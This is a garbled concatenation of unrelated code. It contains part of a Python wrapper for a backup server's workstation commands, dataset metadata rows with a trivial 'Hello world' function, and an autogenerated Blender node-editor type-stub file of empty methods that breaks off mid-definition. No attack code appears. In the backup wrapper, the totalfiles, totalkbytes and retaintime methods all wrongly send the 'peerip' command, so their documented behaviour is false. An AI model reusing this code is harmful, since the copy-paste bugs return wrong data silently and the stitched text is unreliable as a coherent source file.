-On Success: the time in seconds (Posix time)
"""
method_name = "lastbegin"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def lastend(self):
"""
Syntax: Workstation<name> lastend
Description: Returns the absolute time in seconds (Posix time) of the
successful end of the last backup operation for the workstation <name>.
This time may be older then the time returned by the lastbegin method
indicating an incomplete (interrupted) backup.
Return Values:
-On Success: the time in seconds (Posix time)
"""
method_name = "lastend"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def lasterror(self):
"""
Syntax: Workstation <name> lasterror
Description: Returns the error message that resulted from the last
backup run for the workstation <name>.
The string "<empty>" is returned in case there is no last error.
Return Values:
-On Success: the error message or the string "<empty>"
"""
method_name = "lasterror"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def nextrun(self):
"""
Syntax: Workstation <name> nextrun
Description: Returns the absolute time in seconds (Posix time) of the
next anticipated backup of the workstation
Return Values:
-On Success: the time in seconds (Posix time)
"""
method_name = "nextrun"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def peerip(self):
"""
Syntax: Workstation <name> peerip
Description: Returns the last known IP of the workstation <name>. If
the workstation does not have an IP recorded so far (for example, it
never got connected to the server), the command returns the string
"<empty>"
Return Values:
-On Success: the workstation IP address in standard dot notation
"""
method_name = "peerip"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def snapshots(self, since=""):
"""
Syntax: Workstation <name> snapshots [<since>]
Description: Returns a list of snapshots maintained for the given
workstation. The optional <since> argument may be given in seconds
(Posix time) to address only snapshots since that date. Otherwise all
known snapshots are returned.
Return Values:
-On Success: a list of snapshots IDs
"""
method_name = "snapshots"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name, since])
@onereturnvalue
def snapsize(self, snapshotId):
"""
Syntax: Workstation <name> snapsize [<snapshotId>]
Description: Returns the allocated size in KBytes of data maintained
for the named workstation. On link based snapshots, one or multiple
<snapshotId> arguments (as returned by the snapshots method) can be
given. The return value is then the allocated size for the current and
all optional given snapshots summed up.
On native snapshots (ZFS, BTRFS), this method accepts one or none
<snapshotId> as parameter. If a snapshot ID is given, the logical size
of that snapshot is returned, otherwise the size of the current state
is returned. The return value does not reflect the required disk space
of native snapshots. All returned sizes are in Kbyte.
Note that this may be a lengthy operation, depending on the number of
files and snapshots.
Return Values:
-On Success: the number of KBytes
"""
method_name = "snapsize"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name, snapshotId])
@onereturnvalue
def totalfiles(self):
"""
Syntax: Workstation <name> totalfiles
Description: Returns the number of files transferred from the
workstation <name> in the last backup operation
Return Values:
-On Success: the number of files
"""
method_name = "peerip"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def totalkbytes(self):
"""
Syntax: Workstation <name> totalkbytes
Description: Returns the number of KBytes transferred from the
workstation <name> in the last backup operation
Return Values:
-On Success: the number of KBytes
"""
method_name = "peerip"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def retaintime(self):
"""
Syntax: Workstation <name> retaintime
Description: Returns the retention time setting for workstation
snapshots.
Return Values:
-On Success: the retention time in seconds
"""
method_name = "peerip"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def template(self):
"""
Syntax: Workstation <name> template
Description: Returns the template ID for workstation <name>.
Return Values:
-On Success: the template ID
"""
method_name = "template"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def configure(hostname, port, username, password, template="",
p5_connection=None):
"""
Syntax: Workstation configure <hostname> <port> <username> <password>
[<template>]
Description: Run this command on the P5 Backup2Go Server.
Using the passed connection parameters <hostname> and <port>, tries to
establish the connection to the remote workstation and, based on it's
host ID, create or reuse the workstation record on the server.
For the purpose of logging in to the server, the workstation will be
seeded with a unique token, shared by the workstation and the server.
This eliminates the need for storing the <username> and/or <password>
for accessing the server on the workstation.
If the optional <template> is given, the workstation is set to use the
given template. Otherwise the workstation is set to use the generic
template.
Return Values:
-On Success: a positive integer as a string
(the name of the new local workstation)
-On Failure: the string "-3": the template could not be set
the string "-2": a wrong user name/password is given
the string "-1": there is a network connection problem
(bad address and/or port)
"""
method_name = "configure"
return exec_nsdchat([module_name, method_name, hostname, port,
username, password, template],
p5_connection)
@onereturnvalue
def disable(self):
"""
Syntax: Workstation <name> disable
Description: Sets the workstation to the Disabled state
Return Values:
-On Success: the string "0"
"""
method_name = "disable"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def enable(self):
"""
Syntax: Workstation <name> enable
Description: Sets the workstation to the Enabled state
Return Values:
-On Success: the string "1"
"""
method_name = "enable"
return self.p5_connection.nsdchat_call([module_name, self.name,
method_name])
@onereturnvalue
def name(p5_connection=None):
"""
Syntax: Workstation name
Description: Returns the Workstation ID of the workstation where the
command is executed
Note:
Unlike all the other workstation commands, this command must be called
on the Workstation
Return Values:
-On Success: the ID or the string “unknown”
"""
method_name = "name"
return exec_nsdchat([module_name, method_name], p5_connection)
def __repr__(self):
return ": ".join([module_name, self.name])
| 37.689274
| 79
| 0.640594
| 2,730
| 23,895
| 5.503663
| 0.09707
| 0.08985
| 0.037271
| 0.055907
| 0.91574
| 0.913677
| 0.911547
| 0.911547
| 0.880599
| 0.874476
| 0
| 0.006288
| 0.287884
| 23,895
| 633
| 80
| 37.748815
| 0.876704
| 0.520569
| 0
| 0.747664
| 0
| 0
| 0.031494
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.196262
| false
| 0.018692
| 0.014019
| 0.004673
| 0.415888
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e16678c5c86b803a556f71fdc615b9df352b0cb5
| 46
|
py
|
Python
|
logic.py
|
Dikower/Starlette-Alice
|
d157f83c4ffb0b1a19d8371c0bb04cf836e187a8
|
[
"MIT"
] | 1
|
2020-03-02T08:24:58.000Z
|
2020-03-02T08:24:58.000Z
|
logic.py
|
Dikower/Starlette-Alice
|
d157f83c4ffb0b1a19d8371c0bb04cf836e187a8
|
[
"MIT"
] | null | null | null |
logic.py
|
Dikower/Starlette-Alice
|
d157f83c4ffb0b1a19d8371c0bb04cf836e187a8
|
[
"MIT"
] | null | null | null |
def do_something():
return 'Hello world!'
| 15.333333
| 25
| 0.673913
| 6
| 46
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.195652
| 46
| 2
| 26
| 23
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0.26087
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
e184436911fd94f03a8fe935738294beb5044fe7
| 43,704
|
py
|
Python
|
typings/bl_ui/space_node.py
|
Argmaster/PyR3
|
6786bcb6a101fe4bd4cc50fe43767b8178504b15
|
[
"MIT"
] | 2
|
2021-12-12T18:51:52.000Z
|
2022-02-23T09:49:16.000Z
|
src/blender/blender_autocomplete-master/2.92/bl_ui/space_node.py
|
JonasWard/ClayAdventures
|
a716445ac690e4792e70658319aa1d5299f9c9e9
|
[
"MIT"
] | 2
|
2021-11-08T12:09:02.000Z
|
2021-12-12T23:01:12.000Z
|
typings/bl_ui/space_node.py
|
Argmaster/PyR3
|
6786bcb6a101fe4bd4cc50fe43767b8178504b15
|
[
"MIT"
] | null | null | null |
import sys
import typing
import bpy_types
import bl_ui.space_toolsystem_common
import bl_ui.properties_grease_pencil_common
import bl_ui.utils
class NODE_HT_header(bpy_types.Header, bpy_types._GenericUI):
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_add(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
bl_translation_context = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_context_menu(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_editor_menus(bpy_types.Menu, bpy_types._GenericUI):
bl_idname = None
''' '''
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_node(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_node_color_context_menu(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_select(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, _context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_MT_view(bpy_types.Menu, bpy_types._GenericUI):
bl_label = None
''' '''
bl_rna = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_collapsible(self, context, layout):
'''
'''
pass
def draw_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_node_color(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_parent_id = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_header_preset(self, _context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_node_generic(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_node_properties(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def show_socket_input(self, socket):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_active_tool(bl_ui.space_toolsystem_common.ToolActivePanelHelper,
bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_annotation(
bl_ui.properties_grease_pencil_common.AnnotationDataPanel,
bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def draw_layers(self, context, layout, gpd):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_backdrop(bpy_types.Panel, bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_material_slots(bpy_types.Panel, bpy_types._GenericUI):
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
bl_ui_units_x = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_header(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class NODE_PT_node_color_presets(bl_ui.utils.PresetPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
preset_add_operator = None
''' '''
preset_operator = None
''' '''
preset_subdir = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def draw_menu(self, layout, text):
'''
'''
pass
def draw_panel_header(self, layout):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_menu(self, searchpaths, operator, props_default, prop_filepath,
filter_ext, filter_path, display_name, add_operator):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
